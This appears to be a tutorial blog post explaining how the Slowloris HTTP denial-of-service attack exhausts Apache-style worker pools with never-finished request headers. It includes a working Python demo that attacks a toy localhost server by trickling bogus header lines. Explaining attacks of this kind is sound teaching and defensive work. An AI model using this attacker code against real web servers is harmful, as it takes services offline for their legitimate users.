A DDoS (Distributed Denial of Service) attack is one of the major problems that organizations deal with today.
Such an attack is very difficult to mitigate, especially for small organizations with a small infrastructure. The main difficulty in dealing with a DDoS attack is that traditional firewall filtering rules do not work well against it: the attacking machines (the machines that take part in the attack as members of a botnet) are usually large in number and spread across diverse geographical locations, so there is no small set of source addresses to block.
A further point is that the type of request used to take down a service mostly looks legitimate; it is the sheer volume of requests that takes the service offline for legitimate clients.
An attack tool released in 2009 by RSnake gained a lot of popularity in security forums and groups, mainly because it needs almost no bandwidth to launch an attack.
The basic idea behind RSnake's tool is that it only affects the targeted HTTP service, without affecting the other services running on the same server.
The name "Slowloris" fits the tool perfectly, because it can single-handedly take down a web server by slowly consuming all of its connection slots.
To understand how the tool works, I recommend reading my post on "HTTP request and response" before going ahead, because a basic understanding of how HTTP works is necessary for this.
Traditional DDoS attack tools and methods aim to exhaust system resources by opening too many TCP connections to the server. Slowloris, however, is not a TCP DoS tool but an HTTP DoS tool.
Slowloris works by making partial HTTP requests to the host (the TCP connections it opens during the attack are complete, legitimate TCP connections; it is only the HTTP request carried on top of them that is never finished).
Slowloris tries to keep each HTTP request open for as long as possible. Web servers like Apache work on a threaded or process-based model with a fixed upper limit on concurrent workers (MaxClients in Apache 1.x and 2.2, MaxRequestWorkers in 2.4). Once every thread or process is busy, the server becomes unavailable for new requests.
Which web servers are affected by a Slowloris attack?
Apache (1.x & 2.x)
GoAhead web server
Web servers that use an event-driven architecture, like nginx, are not affected by a Slowloris attack: a connection that is still waiting for the rest of its headers does not occupy a worker, so holding many such connections open costs the server little more than memory.
It seems that IIS is also not affected by a Slowloris attack (although we have not tested it).
How does the Slowloris HTTP DoS attack work?
An in-depth understanding of HTTP requests and responses is necessary to comprehend this attack tool.
It exploits a deliberate behaviour of the web server (kept by the authors for its advantages, such as serving requests from clients on slow connections): the server waits until a complete request header has been received before it does anything with the request.
Apache and some other web servers have a timeout mechanism. An Apache web server waits for the specified timeout duration for the completion of an incomplete request.
The Apache Timeout directive defaults to 300 seconds in Apache 1.x, 2.0 and 2.2 (reduced to 60 seconds in 2.4) and can be changed. The same timer is what keeps a download to a slow client alive: it also governs how long the server waits between TCP packets while sending a response, so a large file served over a slow link is not broken off. Note that the timeout is measured between successive packets, not over the whole request; Apache 2.2.15 added mod_reqtimeout precisely to bound the total time allowed for receiving a request header.
Now imagine that somebody deliberately sends partial HTTP requests and resets the timeout counter of each one by sending a little bogus data at regular intervals, each time just before the timeout expires.
That is exactly what Slowloris does. It sends partial HTTP requests with bogus headers. Once all connection slots are consumed by partial requests, it keeps the connections alive by sending a further header line every so often, resetting the timeout counter each time.
A complete GET request, as Wget 1.10.2 sends it to www.example.com, looks like this:
GET / HTTP/1.0[CRLF]
User-Agent: Wget/1.10.2 (Red Hat modified)[CRLF]
Accept: */*[CRLF]
Host: www.example.com[CRLF]
Connection: Keep-Alive[CRLF]
[CRLF]
What are those [CRLF]s in that GET request?
CRLF stands for CR (Carriage Return, byte 0x0D) followed by LF (Line Feed, byte 0x0A). These two non-printable control characters together mark the end of a line.
Even when you are typing in a text editor, the editor inserts a line terminator when you press Enter (CRLF on Windows; Unix editors use a bare LF).
Two consecutive CRLF sequences denote a blank line.
In the GET request shown above there are two CRLFs at the end of the "Connection" header, i.e. a blank line. In HTTP, a blank line after the headers represents the end of the header section.
Slowloris takes advantage of this in implementing its attack. It never sends the finishing blank line that would indicate the end of the HTTP header, so the server keeps waiting for the rest of the request.
Some web servers do not commit a worker to a request until its header has arrived completely, so a half-sent header costs them almost nothing. This is the reason why IIS is not affected by a Slowloris attack.
An incomplete request as sent by the Slowloris script is shown below; the snippet is taken from the Slowloris script.
In that snippet, \r\n denotes carriage return and newline in Perl. Two consecutive sequences, "\r\n\r\n", would be needed to denote a blank line, and they are not there. So that is an incomplete HTTP header.
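The two points made above, the header that never gets its terminating blank line and the trickle of bogus header lines that resets the server's timeout before it expires, can be watched end to end in a few lines of Python. The following is an added example written for this post, not the Slowloris script itself: the thread-pool server (ToyThreadedServer), the attacker class (Slowloris), the OS-chosen port and the timing values are all assumptions made for the demo. It holds exactly as many connections as the toy server has workers, so a well-formed request from a legitimate client goes unanswered until the attacker lets go.

```python
"""Toy reproduction of the Slowloris mechanism (added example, not slowloris.pl).
The toy server, the attacker class and the OS-chosen port are demo assumptions."""
import socket
import threading
import time

def header_complete(buf: bytes) -> bool:
    """An HTTP request header ends with a blank line, i.e. CRLF CRLF."""
    return b"\r\n\r\n" in buf

class ToyThreadedServer:
    """Fixed worker pool, like Apache prefork/worker under MaxClients: a worker blocks on
    one connection until its header is complete, and the read timeout restarts whenever
    bytes arrive (Apache's Timeout semantics)."""
    def __init__(self, workers=3, timeout=1.0):
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))       # OS picks a free port
        self.sock.listen(64)
        self.port = self.sock.getsockname()[1]
        self.timeout = timeout
        self.slots = threading.Semaphore(workers)
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except OSError:                   # listening socket was closed
                return
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        with self.slots:                      # queues here while every worker is busy
            conn.settimeout(self.timeout)
            buf = b""
            try:
                while not header_complete(buf):
                    chunk = conn.recv(4096)   # every chunk restarts the timeout
                    if not chunk:
                        return
                    buf += chunk
                conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok")
            except OSError:                   # socket.timeout (Apache: 408) or peer gone
                pass
            finally:
                conn.close()

class Slowloris:
    """Holds `count` connections open with a request header that never ends."""
    def __init__(self, port, count, interval):
        self.socks = []
        for _ in range(count):
            s = socket.create_connection(("127.0.0.1", port))
            s.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n")  # no "\r\n\r\n"
            self.socks.append(s)
        self._stop = False
        # interval must stay below the server's timeout
        threading.Thread(target=self._feed, args=(interval,), daemon=True).start()

    def _feed(self, interval):
        while not self._stop:
            time.sleep(interval)
            for s in self.socks:
                try:
                    s.sendall(b"X-a: b\r\n")  # bogus header line resets the timer
                except OSError:
                    pass

    def stop(self):
        self._stop = True
        for s in self.socks:
            s.close()

def legit_request(port, timeout):
    """A well-formed GET; True if answered with 200 within `timeout` seconds."""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
            return s.recv(64).startswith(b"HTTP/1.1 200")
    except OSError:                           # socket.timeout is an OSError
        return False

def run_demo(workers=3, server_timeout=1.0):
    """Service before, during and after an attack holding exactly `workers` slots."""
    server = ToyThreadedServer(workers, server_timeout)
    before = legit_request(server.port, 2.0)
    attack = Slowloris(server.port, workers, server_timeout / 2)
    time.sleep(server_timeout * 1.5)          # past Timeout, yet no slot was freed
    during = legit_request(server.port, server_timeout)
    attack.stop()
    time.sleep(0.5)                           # workers notice the closed peers
    after = legit_request(server.port, 2.0)
    server.sock.close()
    return {"before": before, "during": during, "after": after}

if __name__ == "__main__":
    print(run_demo())                         # {'before': True, 'during': False, 'after': True}
```

run_demo() returns before=True, during=False, after=True: the attacker never lets a gap longer than the server's one-second Timeout pass, because it sends a bogus X-a: b line on every connection each half second, and only three connections (one per worker) are needed. Against an event-driven server such as nginx the same script achieves nothing, as noted above, because no worker is tied up while a connection waits for its headers.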
Slowloris Perl script HTTP DoS attack and its usage